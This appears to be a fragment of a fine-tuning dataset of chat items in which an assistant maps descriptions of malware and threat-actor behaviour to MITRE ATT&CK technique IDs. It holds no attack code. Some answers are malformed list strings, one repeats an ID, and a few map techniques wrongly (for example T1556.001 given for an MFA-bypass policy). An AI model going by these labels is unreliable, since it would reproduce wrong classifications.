- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "communicates via DNS for C2."
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Astaroth uses an external software known as NetPass to recover passwords."
- },
- {
- "role": "assistant",
- "content": "T1552 - Unsecured Credentials', 'T1555 - Credentials from Password Stores"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "when the method R is invoked, InstallUtil.exe is spawned in suspended mode. The memory blocks of the suspended process are unmapped and rewritten with the sections of the payload program passed as an argument to method R. The thread is allowed to continue after changes have been made to the entry point."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT32 has used Web shells to maintain access to victim websites."
- },
- {
- "role": "assistant",
- "content": "T1505.003 - Server Software Component: Web Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RATANKBA uploads and downloads information."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Dragonfly 2.0 compromised user credentials and used valid accounts for operations."
- },
- {
- "role": "assistant",
- "content": "T1078 - Valid Accounts"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KGH_SPY can collect drive information from a compromised host."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Briba downloads files onto infected hosts."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "njRAT has used HTTP to receive stolen information from the infected machine."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "attempts to bypass default User Access Control (UAC) settings by exploiting a backward-compatibility setting found in Windows 7 and later."
- },
- {
- "role": "assistant",
- "content": "T1548.002 - Abuse Elevation Control Mechanism: Bypass User Account Control"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has the capability to retrieve information about users on remote hosts."
- },
- {
- "role": "assistant",
- "content": "T1087 - Account Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bisonal has been delivered as malicious email attachments."
- },
- {
- "role": "assistant",
- "content": "T1566.001 - Phishing: Spearphishing Attachment"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Operation Honeybee, the threat actors obtained a list of running processes on a victim machine using `cmd /c tasklist > %temp%\\temp.ini`."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HAWKBALL can collect the user name of the system."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "may be used to interact with and modify the Windows Registry of a local or remote system at the command-line interface."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Taidoor can perform DLL loading."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Kasidet has the ability to download and execute additional files."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses DLL side-loading, typically using a digitally signed sample of Kaspersky Anti-Virus (AV) 6.0 for Windows Workstations or McAfee's Outlook Scan About Box to load malicious DLL files."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After creating this scheduled task for persistence, the Trojan will begin communicating with its C2 server"
- },
- {
- "role": "assistant",
- "content": "T1053 - Scheduled Task/Job', 'T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "uses a Port 22 malware variant to modify several Registry keys."
- },
- {
- "role": "assistant",
- "content": "T1112 - Modify Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "A variant has used DLL side-loading."
- },
- {
- "role": "assistant",
- "content": "T1574.002 - Hijack Execution Flow: DLL Side-Loading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "malware creates a scheduled task entitled “IE Web Cache” to execute a malicious file hourly."
- },
- {
- "role": "assistant",
- "content": "T1053.005 - Scheduled Task/Job: Scheduled Task"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KillDisk has the ability to quit and delete itself."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects the username from the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "collects information about running processes."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "After a user logs on, a variety of credentials are generated and stored in the Local Security Authority Subsystem Service, LSASS, process in memory. While you can prevent a Windows computer from creating the LM hash in the local computer SAM database (and the AD database), this doesn’t prevent the system from generating the LM hash in memory. By default, Windows Server 2008 and Windows Vista no longer generate LM hashes for users unless explicitly enabled. Starting with Windows 8.1 and Windows Server 2012 R2, the LM hash and “clear-text” password are no longer in memory. This functionality was also “back-ported” to earlier versions of Windows (Windows 7/8/2008R2/2012) in kb2871997, though in order to prevent the “clear-text” password from being placed in LSASS, the following registry key needs to be set to “0” (Digest Disabled"
- },
- {
- "role": "assistant",
- "content": "T1098 - Account Manipulation"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "SombRAT can execute \"loadfromfile\", \"loadfromstorage\", and \"loadfrommem\" to inject a DLL from disk, storage, or memory respectively."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "QuasarRAT can enumerate the username and account type."
- },
- {
- "role": "assistant",
- "content": "T1033 - System Owner/User Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 created new Windows services and added them to the startup directories for persistence."
- },
- {
- "role": "assistant",
- "content": "T1543.003 - Create or Modify System Process: Windows Service"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "KONNI can download files and execute them on the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "DarkVishnya scanned the network for public shared folders."
- },
- {
- "role": "assistant",
- "content": "T1135 - Network Share Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The discovery modules used with Duqu can collect information on open windows."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "njRAT can read specific registry values."
- },
- {
- "role": "assistant",
- "content": "T1012 - Query Registry"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "reports window names along with keylogger information to provide application context."
- },
- {
- "role": "assistant",
- "content": "T1010 - Application Window Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "MSTIC has observed NICKEL drop their malware into existing installed software paths. They did this to make their malware appear to be files used for an installed application. The following are example paths"
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Talos has identified two different infection vectors associated with this particular campaign. The second vector is a trojanized Word document that prompts the victim to enable macros and run a Visual Basic script. In the first scenario, Talos discovered a document named \"MinutesofMeeting-2May19.docx\", that appeared to display the national flag of Jordan"
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "decodes embedded XOR strings."
- },
- {
- "role": "assistant",
- "content": "T1140 - Deobfuscate/Decode Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "POWRUNER can execute commands from its C2 server."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Agent.btz attempts to download an encrypted binary from a specified domain."
- },
- {
- "role": "assistant",
- "content": "T1105 - Ingress Tool Transfer"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FIN7 has used RDP to move laterally in victim environments."
- },
- {
- "role": "assistant",
- "content": "T1021.001 - Remote Services: Remote Desktop Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Figure 2 Employee survey displayed after credential theft The November 2017 document displays a password handover document after credential theft occurs, as seen in Figure 3"
- },
- {
- "role": "assistant",
- "content": "T1003 - OS Credential Dumping"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "APT41 used \"cmd.exe /c\" to execute commands on remote machines.\nAPT41 used a batch file to install persistence for the Cobalt Strike BEACON loader."
- },
- {
- "role": "assistant",
- "content": "T1059.003 - Command and Scripting Interpreter: Windows Command Shell"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "can gather the disk volume information."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "StoneDrill can wipe the accessible physical or logical drives of the infected machine."
- },
- {
- "role": "assistant",
- "content": "T1561.001 - Disk Content Wipe"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Azorult can collect the machine information, system architecture, the OS version, computer name, Windows product name, the number of CPU cores, video card information, and the system language."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Data exfiltration is done by Okrum using the already opened channel with the C2 server."
- },
- {
- "role": "assistant",
- "content": "T1041 - Exfiltration Over C2 Channel"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "creates a backdoor through which remote attackers can open a command-line interface."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter', 'T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During Night Dragon, threat actors dumped account hashes using gsecdump."
- },
- {
- "role": "assistant",
- "content": "T1003.002 - OS Credential Dumping: Security Account Manager"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "has deleted and overwrote files to cover tracks."
- },
- {
- "role": "assistant",
- "content": "T1070.004 - Indicator Removal on Host: File Deletion"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The DNS response will return a CNAME record that points to a Command and Control (C2) domain. The C2 traffic to the malicious domains is designed to mimic normal SolarWinds API communications"
- },
- {
- "role": "assistant",
- "content": "T1071.004 - Application Layer Protocol: DNS"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The Trojan uses HTTP POST requests, as seen in Figure 1 to send data to the C2 server, and GET requests to receive commands from the server, as seen in Figure 2"
- },
- {
- "role": "assistant",
- "content": "T1071 - Application Layer Protocol"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "ShimRatReporter communicated over HTTP with preconfigured C2 servers."
- },
- {
- "role": "assistant",
- "content": "T1071.001 - Application Layer Protocol: Web Protocols"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Koadic can perform process injection by using a reflective DLL."
- },
- {
- "role": "assistant",
- "content": "T1055.001 - Process Injection: Dynamic-link Library Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BACKSPACE allows adversaries to search for files."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bazar can use Winlogon Helper DLL to establish persistence."
- },
- {
- "role": "assistant",
- "content": "T1547.004 - Boot or Logon Autostart Execution: Winlogon Helper DLL"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FELIXROOT collects the victim’s computer name, processor architecture, OS version, volume serial number, and system type."
- },
- {
- "role": "assistant",
- "content": "T1082 - System Information Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "P.A.S. Webshell has the ability to list and extract data from SQL databases."
- },
- {
- "role": "assistant",
- "content": "T1213 - Data from Information Repositories"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HTRAN can proxy TCP socket connections to obfuscate command and control infrastructure."
- },
- {
- "role": "assistant",
- "content": "T1090 - Proxy"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "During C0015, the threat actors used the command `net localgroup \"adminstrator\" ` to identify accounts with local administrator rights."
- },
- {
- "role": "assistant",
- "content": "T1069.001 - Permission Groups Discovery: Local Groups"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "VERMIN can perform screen captures of the victim’s machine."
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "FLASHFLOOD searches for interesting files (either a default or customized set of file extensions) on the local system. FLASHFLOOD will scan the My Recent Documents, Desktop, Temporary Internet Files, and TEMP directories. FLASHFLOOD also collects information stored in the Windows Address Book."
- },
- {
- "role": "assistant",
- "content": "T1005 - Data from Local System"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Suckfly the victim's internal network for hosts with ports 8080, 5900, and 40 open."
- },
- {
- "role": "assistant",
- "content": "T1046 - Network Service Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Chinese state-sponsored cyber actors were observed creating a new sign-in policy to bypass MFA requirements to maintain access to the victim network."
- },
- {
- "role": "assistant",
- "content": "T1556.001 - Domain Controller Authentication"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Grandoreiro can write or modify browser shortcuts to enable launching of malicious browser extensions."
- },
- {
- "role": "assistant",
- "content": "T1547.009 - Boot or Logon Autostart Execution: Shortcut Modification"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Micropsia executes an RAR tool to recursively archive files based on a predefined list of file extensions (*.xls, *.xlsx, *.csv, *.odt, *.doc, *.docx, *.ppt, *.pptx, *.pdf, *.mdb, *.accdb, *.accde, *.txt)."
- },
- {
- "role": "assistant",
- "content": "T1119 - Automated Collection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Sykipot may gather a list of running processes by running \"tasklist /v\"."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "WhisperGate has the ability to inject its fourth stage into a suspended process created by the legitimate Windows utility `InstallUtil.exe`."
- },
- {
- "role": "assistant",
- "content": "T1055.012 - Process Injection: Process Hollowing"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "EnvyScout can write files to disk with JavaScript using a modified version of the open-source tool FileSaver."
- },
- {
- "role": "assistant",
- "content": "T1059.007 - Command and Scripting Interpreter: JavaScript"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "TrickBot uses module networkDll for process list discovery."
- },
- {
- "role": "assistant",
- "content": "T1057 - Process Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Bandook has a command to list files on a system."
- },
- {
- "role": "assistant",
- "content": "T1083 - File and Directory Discovery"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "RunningRAT adds itself to the Registry key \"Software\\Microsoft\\Windows\\CurrentVersion\\Run\" to establish persistence upon reboot."
- },
- {
- "role": "assistant",
- "content": "T1547.001 - Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HOPLIGHT has injected into running processes."
- },
- {
- "role": "assistant",
- "content": "T1055 - Process Injection"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Malware features Remexi boasts features that allow it to gather keystrokes, take screenshots of windows of interest (as defined in its configuration), steal credentials, logons and the browser history, and execute remote commands"
- },
- {
- "role": "assistant",
- "content": "T1113 - Screen Capture"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "BADCALL encrypts C2 traffic using an XOR/ADD cipher."
- },
- {
- "role": "assistant",
- "content": "T1573.001 - Symmetric Cryptography"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "HermeticWizard has been named `exec_32.dll` to mimic a legitimate MS Outlook .dll."
- },
- {
- "role": "assistant",
- "content": "T1036.005 - Masquerading: Match Legitimate Name or Location"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The file is named netwf.dat"
- },
- {
- "role": "assistant",
- "content": "T1036 - Masquerading"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "The configuration data is encrypted with the same algorithm described previously by JPCert but using a different XOR value"
- },
- {
- "role": "assistant",
- "content": "T1027 - Obfuscated Files or Information"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
- "content": "Given a description of an attack technique, tactic, or procedure, return only an accurate MITRE ATT&CK ID and Name in the format: \"ID# - Technique\". "
- },
- {
- "role": "user",
- "content": "Stealth Falcon malware uses WMI to script data collection and command execution on the victim."
- },
- {
- "role": "assistant",
- "content": "T1059 - Command and Scripting Interpreter"
- }
- ]
- },
- {
- "messages": [
- {
- "role": "system",
